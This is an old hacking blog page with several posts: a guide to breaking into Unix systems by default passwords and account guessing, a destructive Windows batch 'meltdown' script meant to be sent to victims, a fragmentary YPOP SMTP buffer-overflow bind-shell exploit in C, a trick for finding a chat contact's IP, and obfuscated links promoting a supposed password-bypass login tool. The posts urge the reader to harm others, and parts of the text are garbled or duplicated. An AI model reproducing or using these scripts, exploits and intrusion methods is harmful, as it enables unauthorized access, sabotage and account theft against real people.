Wednesday, November 14, 2007

Hacking into Unix System?

Hacking into Unix System?
I will be referring to all the UNIX variants/etc as UNIX, so when I say something about UNIX, it generally means all the variants (Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless I state a variant in particular.

Most commonly used passwords during the remote log

------- --------
root root - Rarely open to hackers
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot * See Below
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
Public access Unixes [like Public BBSs] will tell you how to logon if you are a new users. Unfortunatly, this phile is not about public access Unixes, but I will talk about them briefly later, as a UUCP/UseNet/Bitnet address for mail. OK. You've gotten to the login prompt! Now, what you need to do here is enter in a valid account. An Account usually consists of 8 characters or less. After you enter in an account, you will probably get a password prompt of some sort. The prompts may vary, as the source code to the login program is usually supplied with UNIX, or is readily available for free. Well, The easiest thing I can say to do to login is basically this: Get an account, or try the defaults. The defaults are ones that came with the operating system, in standard form. The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power.

The REBOOT login is what as known as a command login, which just simply doesn't let you into the operating system, but executes a program assigned to it. It usually does just what it says, reboot the system.

There are "command logins", which, like reboot, execute a command then log you off instead of letting you use the command interpreter. BSD is notorious for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same
These are the most useful, since they will give the account names that are online, thus showing you several accounts that actually exist. When you get an invalid Account name / invalid password, or both, you will get some kind of error. Usually it is the "login incorrect" message. When the computer tells you that, you have done something wrong by either entering an invalid account name, or a valid account name, but invalid password. It does not tell you which mistake you made, for obvious reasons. Also, when you login incorrectly, the error log on the system gets updated, letting the sysops(s) know something is a miss.

Another error is "Cannot change to home directory" or "Cannot Change Directory." This means that no "home directory" which is essentially the 'root' directory for an account, which is the directory you start off in. On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in /homedirectory. [Note: The / is used in directories on UNIX, not a \ ]. Most systems will log you off after this, but some tell you that they will put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined for that particular account. The "shell" will be explained later. Some systems will log you off after this message. Others will tell you that they will use the regular shell, by saying "Using the bourne shell", or "Using sh"
User structure in the UNIX environment.

Think of UNIX having two levels of security: absolute power, or just a regular user. The ones that have absolute power are those users at the root level. Ok, now is the time to think in numbers. Unix associates numbers with account names. each account will have a number. Some will have the same number. That number is the UID [user-id] of the account. the root user id is 0. Any account that has a user id of 0 will have root access. Unix does not deal with account names (logins) but rather the number associated with them. for instance, If my user-id is 50, and someone else's is 50, with both have absolute power of each other, but no-one else.

A shell is an executable program which loads and runs when a user logs on, and is in the foreground. This "shell" can be any executable program, and it is defined in the "passwd" file which is the userfile. Each login can have a unique "shell". Ok. Now the shell that we usually will work with is a command interpreter. A command interpreter is simply something like MSDOS's COMMAND.COM, which processes commands, and sends them to the kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix systems
csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not the same thing. This allows for many files to be able to be stored, since "Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using the [] stuff, you have to specify capital letters if any files you are dealing with has capital letters. Most everything is lower case though

Commands to use?

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

$ ls
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission.
the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
$ cat note.txt
This is a sample text file!

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
$ ls /usr/datwiz

pwd - gives current directory
$ pwd
$ cd src
$ pwd
$ cd ..
$ pwd
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
$ cd $home
[goto home dir]
$ pwd

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
"mail username@address" or
"mail username"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik

might have seen the mail bombing in the die hard 4 [
ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
$ ps
122 001 ksh
123 001 watch
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"
kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed

you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (will be explained later).

HACKING UNIX SYSTEM?????????????????????????

The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section. Hacking can also be just to get other's accounts also.

Getting IN
The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"
or Just
"Young Inc. Please login"

Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering. Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.

Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are:

If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use there login name as their password. For instance, the user
"bob" may have a password named "bob" or "bob1". This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young"
Young, INC. Please Login.
login: young
(c)1984 AT&T..

Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.

There are several files that are very important to the UNIX
environment. They are as follows:

/etc/passwd - This is probably the most important file on a Unix. Why?
well, basically, it holds the valid usernames/passwords.
This is important since only those listed in the passwd
file can login, and even then some can't (will explain).
The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh
In the first line, sirhack is a valid user. The second
field, however, is supposed to be a password, right? Well,
it is, but it's encrypted with the DES encryption standard.
the part that says "&a,Ty" may include a date after the comma
(Ty) that tells unix when the password expires. Yes, the
date is encrypted into two alphanumeric characters (Ty).

In the Second example, the demo account has no password.
so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T

But with sirhack, you'd have to enter a password. Now,
the password file is great, since a lot of times, you;ll
be able to browse through it to look for unpassworded
accounts. Remember that some accounts can be restricted
from logging in, as such:


The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell

Remember that some accounts can be restricted
from logging in, as such:


The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell (explained later).
note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time its just random letters and numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who
says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password. If they match, you're in. Now, there are password hackers, but they do not decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until it finds a match (later on!). Remember, few, if none, have decrypted the password file successfully


System Meltdown Script

System Meltdown Script?
System meltdown script .combination of different scripts so don't directly run it on ur pc or ur pc will have some serious probs ......... save it in notepad and then in dos shell convert it to .bat or .exe file and then send it to anyone and see him or her crying !!!! Rao! rao! hehe. Really kool and is such an easy script tat no antivirus can detect it coz its just a combination of different commands of batch programming nothing else !!!!! enjoy !!!

ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f


Ypop Smtp Remote Buffer Overflow Exploit?

Ypop Smtp Remote Buffer Overflow Exploit?
This Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.

Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE

The EIP register will be overwritten and our code will be executed smile.gif
here is a little exploit


/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h =
*-= ---------------------------------- =-


//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread

unsigned char shellcode[] =

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

int fd,bytes;

void usage(char *prog)
printf("Usage: %s \n",prog);
printf(" -h e.g (-h\n");
printf(" -p e.g (-p 25\n");
int main(int argc, char *argv[])
int arg,port,stack,i;
char evilbuf[1024];
char *hostname;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;

printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");

printf("- - - - - - - - - - - - - - - - - - - - - \n");

if(argc<4) {

while((arg=getopt(argc, argv, "h:p:t:")) != EOF) {
switch(arg) {
case 'h':
case 'p':

printf("[-] Error Resolving Hostname.. Failed\n");
printf("[+] Connecting to %s on port %i\n",hostname,port);

printf("[-] Socket Creation Failed.\n");
client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);

if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);

printf("[+] Connected!\n");

if((bytes=recv(fd,buffer,300,0)) == NULL)
printf("[-] Error Receiving Welcome\n");
if((strstr(buffer,"220")==NULL) || (strstr(buffer,"YahooPOPs")==NULL) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");


printf("[+] Sending Evil Shellcode\n");

printf("[-] Error sending Shellcode\n");

printf("[+] Done. Now do:\n");
printf(" -> nc %s %i or\n",hostname,port);
printf(" -> telnet %s %i\n",hostname,port);


To send a file to a remote computer:-

1. Open HyperTerminal.

2. Open a saved connection file or create a new connection.

3. Connect to the remote computer.

4. On the Transfer menu, click Send File.

5. In the Filename box, type the path and name of the file you want to send.

6. In the Protocol list, click the protocol your computer is using to send the file.

7. Click Send.

And make sure:

Both the sending computer and the receiving computer must be using the same file transfer protocol.

In most cases, you need to configure the file-transfer software on the remote computer so that it receives the file correctly. For more information, contact the administrator of the remote computer.

If you use the Zmodem protocol to transfer data, the remote computer will receive the file automatically and will not need to perform a manual receive procedure.

Be aware that the automatic download feature of the Zmodem protocol can pose a security risk by allowing remote users to send files to your computer without your explicit permission. To avoid this risk, you must select a protocol other than Zmodem or clear the Allow remote host initiated file transfers check box on the Settings tab of Connection Properties.

Add or remove restrictions?

Add or remove restrictions?
If you want to make restrictions to what users can do or use on their computer without having to run Poledit, you can edit the Registry. You can add and delete Windows features in this Key shown below.
Zero is Off and the value 1 is On. Example: to Save Windows settings add or modify the value name NoSaveSettings to 0, if set to1 Windows will not save settings. And NoDeletePrinter set to 1 will prevent the user from deleting a printer.
The same key shows up at:
HKEY_USERS\(yourprofilename)\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer so change it there also if you are using different profiles.
1.Open RegEdit
2.Go to
HKEY_CURRENT_USER\Software\Microsoft\ CurrentVersion\ Policies
3.Go to the Explorer Key (Additional keys that can be created under Policies are System, Explorer, Network and WinOldApp )
4.You can then add DWORD or binary values set to 1 in the appropriate keys for ON and 0 for off.
NoDeletePrinter - Disables Deletion of Printers
NoAddPrinter - Disables Addition of Printers
NoRun - Disables Run Command
NoSetFolders - Removes Folders from Settings on Start Menu
NoSetTaskbar - Removes Taskbar from Settings on Start Menu
NoFind - Removes the Find Command
NoDrives - Hides Drives in My Computers
NoNetHood - Hides the Network Neighborhood
NoDesktop - Hides all icons on the Desktop
NoClose - Disables Shutdown
NoSaveSettings - Don't save settings on exit
DisableRegistryTools - Disable Registry Editing Tools
NoRecentDocsMenu - Hides the Documents shortcut at the Start button
NoRecentDocsHistory- Clears history of Documents
NoFileMenu _ Hides the Files Menu in Explorer
NoActiveDesktop - No Active Desktop
NoActiveDesktopChanges- No changes allowed
NoInternetIcon - No Internet Explorer Icon on the Desktop
NoFavoritesMenu - Hides the Favorites menu
NoChangeStartMenu _ Disables changes to the Start Menu
NoFolderOptions _ Hides the Folder Options in the Explorer

firefox version 3 with all new features....try it

firefox version 3 with all new features....try it

replace xx by tt

Shortcuts to your favourite websites?

Shortcuts to your favourite websites?
Hate typing tha annoying long website address? Here's tha solution. With tha click of tha keyboard buttons within no time ur there in your favourite websites. hehe

yahoomail :- ytrytr ctrl+enter

microsoft :- mjumju ctrl+enter

youtube :- ygvygv ctrl+enter

orkut :- okmokm ctrl+enter

rediffmail :- rtyrty ctrl+enter

imagevenue :- ijnijn ctrl+enter

istockphoto :- iuyiuy ctrl+enter

bestbuy :- bgtbgt ctrl+enter

badongo :- bvcbvc ctrl+enter

careerbuilder:- cftcft ctrl+enter
nytimes :- nbvnbv ctrl+enter

netflix :- nhynhy ctrl+enter

rapidshare :- rfvrfv ctrl+enter :- uytuyt ctrl+enter :- vgyvgy ctrl+enter

usatoday :- uhbuhb ctrl+enter

uwants :- ujmujm ctrl+enter :- xdrxdr ctrl+enter :- xswxsw ctrl+enter

myrealdoor :- mnbmnb ctrl+enter

how to access another computer?

how to access another computer?
if i have the ip address of a comp & it is connected to lan with my comp then how can i access that comp.............

N.B- i can access the share document ,,but i want to access the hole f.d

is it possible...................

pls explain that....................

& what is remote comp................

Remote Computer is a computer other than urs in your network...

it is possible to access only shared folders. There is another type called admin share .. which allows to access computer by its administrator account..

Dos Command "net accounts" can be used to display the user accounts database and modify password and logon requirements for all accounts.

Syntax: net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain].
Examples: 1) To display the current settings, the password requirements, and the server role for a server, type: net accounts. 2) to force users to log off after the logon time expires with a five-minute warning, type: net accounts /forcelogoff:5.

for more such commands visit to :

if u still want some clarification...

get ip via msn yahoo etc

Share something wid him..mayb a song or some picture..worth 2mb..nd then go to start>Run>Cmd nd then type netstat -n nd then u ll see a lot of ip's wid lotta ports..see the port number 5101 nd thatz the victim's ip...

secretly add buddies to your yahoo id


Orkut Yahoo Gmail login withut Password

Orkut Yahoo Gmail login withut Password
hey friends i found software on net by which we can login any orkut gmail and yahoo ids
we just have to write user name and press login button it will open account automatically without password.Here is the link


re[lace xx with tt